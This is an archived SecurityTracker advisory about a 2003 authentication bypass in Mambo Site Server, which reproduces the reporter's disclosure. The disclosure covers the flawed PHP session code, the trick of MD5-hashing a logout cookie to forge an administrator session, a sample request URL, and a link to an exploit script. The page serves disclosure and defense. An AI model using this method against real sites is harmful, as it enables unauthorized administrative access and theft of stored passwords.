Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Mambo Site Server Authentication Bug Gives Remote Users Administrative Access
|
|
SecurityTracker Alert ID: 1006163 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Feb 24 2003
|
Impact: User access via network
|
Exploit Included: Yes
|
Version(s): 4.0.12 RC2
|
Description: An authentication vulnerability was reported in Mambo Site Server. A remote user can gain administrative access to the application.
A vulnerability is reported in the '/administrator/index2.php' script that allows a remote user to specify a valid sessionid to gain
administrator access.
According to the report, the SessionCookie.php script will insert a sessionid into the session table when
the user logs out and set the following type of cookie on the user's browser:
sessioncookie=nh54OQIZb8ybaA2CNNdU1046102063
The
remote user can take this value and hash it using MD5 to create a valid session ID. Then, the remote user can reportedly access
the system with the /administrator/index2.php script and specify the hashed session ID to gain administrative access to the server:
/administrator/index2.php?session_i
d=0ebda5bbba49dc226b4ed8fc801f1d98
With this level of access, the remote user can gain full access to the contents of all databases
used by the Mambo Site Server, including user passwords in the database.
The vendor has reportedly been notified.
|
Impact: A remote user can login to the system as an administrator without supplying valid authentication credentials.
|
Solution: No solution was available at the time of this entry. The vendor is reportedly working on a patch.
The author of the report recommends that, as a workaround, users protect the '/administrator' directory with a web server '.htaccess' file.
|
Vendor URL: www.mamboserver.com/ (Links to External Site)
|
Cause: Authentication error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Simen Bergo <sbergo@thesource.no>
|
Message History:
None.
|
Source Message Contents
|
Date: 24 Feb 2003 17:08:16 -0000
From: Simen Bergo <sbergo@thesource.no>
Subject: Mambo SiteServer exploit gains administrative privileges
|
MAMBO SITESERVER EXPLOIT GAINS ADMINISTRATIVE PRIVILEGES
ŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻ
PROGRAM: Mambo SiteServer
HOMEPAGE: http://www.mamboserver.com/
TESTED: Mambo 4.0.12 RC2
LOGIN REQUIRED: No
PROOF OF CONCEPT
ŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻ
I have created an exploit that will gain access to the host you specify.
It can be found at the URL below, but must only be used on your own website
for testing purposes.
http://www.voidnull.com/exploit/mamboexp.phps
DESCRIPTION
ŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻ
"Mambo SiteServer is the finest open source Web Content Management System
available today." (direct quote from the Mambo SiteServer website)
A vulnerability in /administrator/index2.php allows any user to gain
administrator access as long as they know any sessionid in the session
table the script uses. (The code that is vulnerable is too big to include
here)
Actually, you would think just logging in as a normal user would create
this sessionid, however a bug in the PHP sourcecode of the project make
sure this does not happen.
Anyone with a slight knowledge of PHP knows that when you set a cookie,
it is not updated until you refresh the webpage. Anyone but the coders
of Mambo SiteServer, that is:
setcookie("sessioncookie", "$sessionID");
if ($HTTP_COOKIE_VARS["sessioncookie"]!="") {
$query="INSERT into ".$dbprefix."session set
session_id='$cryptSessionID', guest='', userid='$uid',
usertype='$usertype', gid='$gid', username='$username'";
$database->openConnectionNoReturn($query);
As we can see, Mambo SiteServer checks if the cookie has been set before
it inserts the sessionid into the table. As it has not yet been set, no
sessionid is inserted and therefore we cannot "login" to the
administrator directory either.
Moving on in the sourcecode, to SessionCookie.php (which is called when
you logout), we can see that a sessionid is inserted whenever you logout.
Why? I have no idea.
$current_time = time();
if ($HTTP_COOKIE_VARS["sessioncookie"]==""){
$randnum=getSessionID1();
...
$cryptrandnum=md5($randnum);
...
setcookie("sessioncookie", "$randnum");
$guest=1;
$query="INSERT into ".$dbprefix."session SET username='',
time=$current_time, session_id='$cryptrandnum', guest=$guest";
$database->openConnectionNoReturn($query);
A cookie, looking something like the following will now be sent to the
browser:
sessioncookie=nh54OQIZb8ybaA2CNNdU1046102063
All we have to do is MD5-encrypt it, since that is what was done to the
session that was inserted to the MySQL-table. In this example the encrypted
version is:
0ebda5bbba49dc226b4ed8fc801f1d98
By accessing /administrator/index2.php with this session, Mambo SiteServer
will think that we are the administrator logged in:
/administrator/index2.php?session_id=0ebda5bbba49dc226b4ed8fc801f1d98
SUMMARY
ŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻ
Gaining administrative privileges gives you access to all MySQL-databases,
user passwords, news, polls and everything else the server has. Many
websites run Mambo SiteServer in addition to other scripts that requires
MySQL, and this is therefore a huge threat to many webmasters.
SOLUTIONS
ŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻ
Until Mambo release a patch for this vulnerability I suggest password-
protecting your /administrator directory with .htaccess.
VENDOR STATUS
ŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻ
The vendor has reportedly been notified. They are currently developing
a patch for this vulnerability.
|
|
Go to the Top of This SecurityTracker Archive Page
|
